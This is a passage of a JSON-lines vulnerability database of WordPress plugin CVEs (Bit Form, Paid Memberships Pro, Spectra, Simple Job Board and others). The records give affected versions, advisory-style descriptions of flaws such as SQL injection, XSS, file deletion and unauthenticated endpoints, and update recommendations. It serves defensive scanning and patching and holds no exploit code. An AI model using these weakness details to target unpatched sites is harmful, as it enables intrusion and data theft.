version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73b6b22a-4699-4307-8a03-148dd9e95d36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73b6b22a-4699-4307-8a03-148dd9e95d36?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Admin\\\/AdminAjax.php#L1108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Admin\\\/AdminAjax.php#L1108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Admin\\\/Form\\\/AdminFormHandler.php#L2387\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Admin\\\/Form\\\/AdminFormHandler.php#L2387\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Core\\\/Messages\\\/EmailTemplateHandler.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Core\\\/Messages\\\/EmailTemplateHandler.php#L93\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7777","slug":"bit-form","versionImpact":"2.13.9","versionEndExcluding":"2.13.10","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to arbitrary file read and deletion due to insufficient file path validation in multiple functions in versions 2.0 to 2.13.9. This makes it possible for authenticated attackers, with Administrator-level access and above, to read and delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 2.13.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4deb128d-0163-4a8e-9591-87352f74c3ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4deb128d-0163-4a8e-9591-87352f74c3ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L829\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L829\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L852\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L852\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L875\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L875\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L898\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L898\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7775","slug":"bit-form","versionImpact":"2.13.9","versionEndExcluding":"2.13.10","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to arbitrary JavaScript file uploads due to missing input validation in the addCustomCode function in versions 2.0 to 2.13.9. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary JavaScript files to the affected site's server.","recommendation":"Update to version 2.13.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3936d7dc-840e-41fc-8af4-db40c0cff660?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3936d7dc-840e-41fc-8af4-db40c0cff660?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Admin\\\/AdminAjax.php#L1314\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Admin\\\/AdminAjax.php#L1314\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7702","slug":"bit-form","versionImpact":"2.13.9","versionEndExcluding":"2.13.10","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to generic SQL Injection via the entryID parameter in versions 2.0 to 2.13.9 due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries to already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.13.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07847ba1-cbce-4d81-bd24-46887ac31a5d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07847ba1-cbce-4d81-bd24-46887ac31a5d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/AdminAjax.php#L944\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/AdminAjax.php#L944\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10261","slug":"paid-member-subscriptions","versionImpact":"2.13.0","versionEndExcluding":"2.13.1","description":"The Paid Membership Subscriptions \u2013 Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.13.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 2.13.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaf19371-7b06-45c6-bf16-6ef7dfffb175?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaf19371-7b06-45c6-bf16-6ef7dfffb175?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182968\\\/paid-member-subscriptions\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182968\\\/paid-member-subscriptions\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4366","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.13.0","versionEndExcluding":"2.13.1","description":"The Spectra \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018block_id\u2019 parameter in versions up to, and including, 2.13.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.13.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72a74483-e159-4c51-a9e0-4a128cbf72dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72a74483-e159-4c51-a9e0-4a128cbf72dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080971\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080971\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1546","slug":"mycryptocheckout","versionEndExcluding":"2.124","description":"The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb065397-370f-4ee1-a2c8-20e4dc4415a0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb065397-370f-4ee1-a2c8-20e4dc4415a0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5239","slug":"security-malware-firewall","versionImpact":"2.120","versionEndExcluding":"2.121","description":"The Security & Malware scan by CleanTalk WordPress plugin before 2.121 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to bypass bruteforce protection.","recommendation":"Update to version 2.121, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d748f91-773b-49d6-8f68-a27d397713c3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d748f91-773b-49d6-8f68-a27d397713c3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9222","slug":"paid-member-subscriptions","versionImpact":"2.12.8","versionEndExcluding":"2.12.9","description":"The Paid Membership Subscriptions \u2013 Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.12.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.12.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d43235b-9c5e-4d7f-99f0-28dcab4b2a91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d43235b-9c5e-4d7f-99f0-28dcab4b2a91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-member-subscriptions\\\/tags\\\/2.12.8\\\/includes\\\/admin\\\/class-admin-payments-list-table.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-member-subscriptions\\\/tags\\\/2.12.8\\\/includes\\\/admin\\\/class-admin-payments-list-table.php#L155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160323\\\/#file10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160323\\\/#file10\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1815","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.12.8","versionEndExcluding":"2.12.9","description":"The Spectra \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Gallery block in all versions up to, and including, 2.12.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.12.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cd877e6-e000-437d-ba9f-0640350277e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cd877e6-e000-437d-ba9f-0640350277e4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075043\\\/ultimate-addons-for-gutenberg\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075043\\\/ultimate-addons-for-gutenberg\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1814","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.12.8","versionEndExcluding":"2.12.9","description":"The Spectra \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Testimonial block in all versions up to, and including, 2.12.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.12.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9ed939c-dc9c-46e8-9b23-0a3e5733e8d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9ed939c-dc9c-46e8-9b23-0a3e5733e8d5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075043\\\/ultimate-addons-for-gutenberg\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075043\\\/ultimate-addons-for-gutenberg\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1279","slug":"paid-memberships-pro","versionImpact":"2.12.8","versionEndExcluding":"2.12.9","description":"The Paid Memberships Pro WordPress plugin before 2.12.9 does not prevent users with at least the contributor role from leaking other users' sensitive metadata.","recommendation":"Update to version 2.12.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4c537264-0c23-428e-9a11-7a9e74fb6b69\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4c537264-0c23-428e-9a11-7a9e74fb6b69\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0624","slug":"paid-memberships-pro","versionImpact":"2.12.7","versionEndExcluding":"2.12.8","description":"The Paid Memberships Pro \u2013 Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.12.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae68d083-b6e2-409b-8c91-d4eb7e62dba9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae68d083-b6e2-409b-8c91-d4eb7e62dba9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/services.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/services.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3025164\\\/paid-memberships-pro\\\/tags\\\/2.12.8\\\/includes\\\/services.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3025164\\\/paid-memberships-pro\\\/tags\\\/2.12.8\\\/includes\\\/services.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3107","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.12.6","versionEndExcluding":"2.12.7","description":"The Spectra \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Path Traversal in versions up to, and including, 2.12.6 via the get_block_default_attributes function. This allows authenticated attackers, with contributor-level permissions and above, to read the contents of any files named attributes.php on the server, which can contain sensitive information.","recommendation":"Update to version 2.12.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/110e5e67-b318-4ab2-9b4d-59aabcf7db7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/110e5e67-b318-4ab2-9b4d-59aabcf7db7c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-gutenberg\\\/trunk\\\/classes\\\/class-uagb-block-module.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-gutenberg\\\/trunk\\\/classes\\\/class-uagb-block-module.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3062684\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3062684\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6855","slug":"paid-memberships-pro","versionImpact":"2.12.5","versionEndExcluding":"2.12.6","description":"The Paid Memberships Pro \u2013 Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to unauthorized modification of membership levels created by the plugin due to an incorrectly implemented capability check in the pmpro_rest_api_get_permissions_check function in all versions up to 2.12.5 (inclusive). This makes it possible for unauthenticated attackers to change membership levels including prices.","recommendation":"Update to version 2.12.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/383c7837-e7b7-4608-9cdc-91b7dbc7f4e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/383c7837-e7b7-4608-9cdc-91b7dbc7f4e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/rest-api.php#L528\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/rest-api.php#L528\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/rest-api.php#L997\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/rest-api.php#L997\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011575\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/rest-api.php?contextall=1&old=2947813&old_path=%2Fpaid-memberships-pro%2Ftrunk%2Fincludes%2Frest-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011575\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/rest-api.php?contextall=1&old=2947813&old_path=%2Fpaid-memberships-pro%2Ftrunk%2Fincludes%2Frest-api.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7982","slug":"registrations-for-the-events-calendar","versionImpact":"2.12.3","versionEndExcluding":"2.12.4","description":"The Registrations for the Events Calendar WordPress plugin before 2.12.4 does not sanitise and escape some parameters when accepting event registrations, which could allow unauthenticated users to perform Cross-Site Scripting attacks.","recommendation":"Update to version 2.12.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d79e1e9c-980d-4974-bfbd-d87d6e28d9a6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d79e1e9c-980d-4974-bfbd-d87d6e28d9a6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6187","slug":"paid-memberships-pro","versionImpact":"2.12.3","versionEndExcluding":"2.12.4","description":"The Paid Memberships Pro plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'pmpro_paypalexpress_session_vars_for_user_fields' function in versions up to, and including, 2.12.3. This makes it possible for authenticated attackers with subscriber privileges or above, to upload arbitrary files on the affected site's server which may make remote code execution possible. This can be exploited if 2Checkout (deprecated since version 2.6) or PayPal Express is set as the payment method and a custom user field is added that is only visible at profile, and not visible at checkout according to its settings.","recommendation":"Update to version 2.12.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5979f2eb-2ca8-4b06-814c-c4236bb81af0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5979f2eb-2ca8-4b06-814c-c4236bb81af0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/tags\\\/2.12.3\\\/includes\\\/fields.php#L564\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/tags\\\/2.12.3\\\/includes\\\/fields.php#L564\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.paidmembershipspro.com\\\/pmpro-update-2-12-4\\\/\",\"name\":\"https:\\\/\\\/www.paidmembershipspro.com\\\/pmpro-update-2-12-4\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2997319\\\/paid-memberships-pro\\\/tags\\\/2.12.4\\\/includes\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2997319\\\/paid-memberships-pro\\\/tags\\\/2.12.4\\\/includes\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2997319\\\/paid-memberships-pro\\\/tags\\\/2.12.4\\\/includes\\\/fields.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2997319\\\/paid-memberships-pro\\\/tags\\\/2.12.4\\\/includes\\\/fields.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7351","slug":"simple-job-board","versionImpact":"2.12.3","versionEndExcluding":"2.12.4","description":"The Simple Job Board plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.12.3 via deserialization of untrusted input when editing job applications. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 2.12.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba6312b9-1b66-4b4f-a78d-515fa4aab63b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba6312b9-1b66-4b4f-a78d-515fa4aab63b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3138348%40simple-job-board%2Ftrunk&old=3113171%40simple-job-board%2Ftrunk&sfp_email=&sfph_mail=#file12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3138348%40simple-job-board%2Ftrunk&old=3113171%40simple-job-board%2Ftrunk&sfp_email=&sfph_mail=#file12\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3113","slug":"simple-form","versionImpact":"2.12.1","versionEndExcluding":"2.12.2","description":"The FormFlow: WhatsApp Social and Advanced Form Builder with Easy Lead Collection WordPress plugin before 2.12.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.12.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad85c5c7-f4d1-4374-b3b7-8ee022d27d34\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad85c5c7-f4d1-4374-b3b7-8ee022d27d34\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0772","slug":"optinmonster","versionEndExcluding":"2.12.2","description":"The Popup Builder by OptinMonster WordPress plugin before 2.12.2 does not ensure that the campaign to be loaded via some shortcodes is actually a campaign, allowing any authenticated users such as subscriber to retrieve the content of arbitrary posts, like draft, private or even password protected ones.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28754886-b7b4-44f7-9042-b81c542d3c9c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28754886-b7b4-44f7-9042-b81c542d3c9c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7761","slug":"simple-job-board","versionImpact":"2.12.1","versionEndExcluding":"2.12.2","description":"In the process of testing the Simple Job Board WordPress plugin before 2.12.2, a vulnerability was found that allows Stored XSS on behalf of the editor by embedding a malicious script, which entails an account takeover backdoor","recommendation":"Update to version 2.12.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae8c1c91-3574-4da5-b5dc-d4e3feccac7e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae8c1c91-3574-4da5-b5dc-d4e3feccac7e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12265","slug":"depay-payments-for-woocommerce","versionImpact":"2.12.17","versionEndExcluding":"2.12.18","description":"The Web3 Crypto Payments by DePay for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the \/wp-json\/depay\/wc\/debug REST API endpoint in all versions up to, and including, 2.12.17. This makes it possible for unauthenticated attackers to retrieve debug information.","recommendation":"Update to version 2.12.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205102%40depay-payments-for-woocommerce&new=3205102%40depay-payments-for-woocommerce&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205102%40depay-payments-for-woocommerce&new=3205102%40depay-payments-for-woocommerce&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3eb3444-de5c-4cb0-acaa-c6303fab46e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3eb3444-de5c-4cb0-acaa-c6303fab46e0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7762","slug":"simple-job-board","versionImpact":"2.12.5","versionEndExcluding":"2.12.16","description":"The Simple Job Board WordPress plugin before 2.12.6 does not prevent uploaded files from being listed, allowing unauthenticated users to access and download uploaded resumes","recommendation":"Update to version 2.12.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26403e72-c927-4649-b789-694a10ad0492\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26403e72-c927-4649-b789-694a10ad0492\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
